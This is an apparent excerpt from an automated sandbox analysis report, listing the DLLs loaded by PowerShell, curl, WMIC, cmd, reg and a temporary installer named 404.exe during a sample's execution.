            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: olepro32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: msftedit.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: windows.globalization.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: bcp47mrm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: globinputhost.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: windows.ui.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: windowmanagementapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: inputhost.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: linkinfo.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: ntshrui.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
            Source: C:\Windows\System32\reg.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
